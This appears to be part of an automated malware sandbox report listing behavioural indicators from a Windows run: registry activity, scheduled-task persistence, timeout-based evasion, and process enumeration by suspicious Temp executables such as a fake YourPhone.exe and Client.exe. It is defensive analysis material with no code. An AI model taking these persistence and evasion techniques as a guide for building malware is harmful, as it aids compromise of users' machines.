Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1497073144-2389943819-3385106915-1000\{A5ED4158-F359-4DEC-8D25-9EBED6805E82} C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
